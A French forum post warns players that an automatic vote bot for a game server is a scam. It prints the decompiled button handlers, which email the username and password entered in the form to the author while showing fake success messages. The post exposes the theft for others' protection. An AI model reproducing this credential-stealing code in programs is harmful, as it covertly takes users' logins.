Bonjour,
Le programme permet de voter automatiquement toutes les 2 heures sans avoir à aller sur le site web. Faites tout de même attention à ne pas trop voter car les admins contrôlent le nombre de vote possible.
Ou pas j'ai envie de dire !
Comme c'est simple de désassembler un programme codé en .NET (je suis d'un naturel curieux), et c'est fou ce qu'on peut trouver comme belle chose à l'intérieur :
Premièrement c'est un programme windows form tout ce qu'il y a de plus basique et de plus rapidement codé (pas de nom explicite des éléments de l'interface, c'est trop compliqué à changer et puis fuck it, Button1, Button2 c'est bien aussi, Cf image ci dessous).
De plus vous remarquerez la simplicité de l'architecture de l'application. Juste une bête classe Mail qui semble avoir été codée (ou recopiée). Vous me direz mais à quoi sert une classe Mail - qui, le nom est explicite, sert à envoyer un e mail - dans un programme de vote ?
Je vous laisse quelques minutes de réflexion.
Besoin d'un indice ?
Code:
private void Button2_Click(object sender, EventArgs e)
{
new Form1.Mail()
{
receiver = "[email protected]",
subject = ("Username : " + this.TextBox1.Text + " Password :" + this.TextBox2.Text),
body = "Message"
}.send();
this.Button3.Enabled = true;
this.Button2.Enabled = false;
int num = (int) Interaction.MsgBox((object) "Le vote automatique a été activé", MsgBoxStyle.OkOnly, (object) "Bot Vote Paragons-servers.com - By Kachyos");
}
private void Button1_Click(object sender, EventArgs e)
{
new Form1.Mail()
{
receiver = "[email protected]",
subject = ("Username : " + this.TextBox1.Text + " Password :" + this.TextBox2.Text),
body = "Message"
}.send();
int num = (int) Interaction.MsgBox((object) "Vos identifiants sont corrects.", MsgBoxStyle.OkOnly, (object) "Bot Vote Paragons-servers.com - By Kachyos");
}
Voici ce que font les boutons "Tester les identifiants" (Button1) et "Vote automatique" (Button2). Ces deux boutons récupèrent les identifiants rentrés et les envoient gentiment à l'auteur de ce gentil petit programme.
Ne vous étonnez pas si le bot de vote ne fonctionne pas après cela !
J'espère qu'avec mon poste je vais éveiller l'attention de certaines personnes, ne croyez pas sur parole une personne qui vous offre une solution toute cuite.
Sur ce, Bonne journée et bon jeu à tous !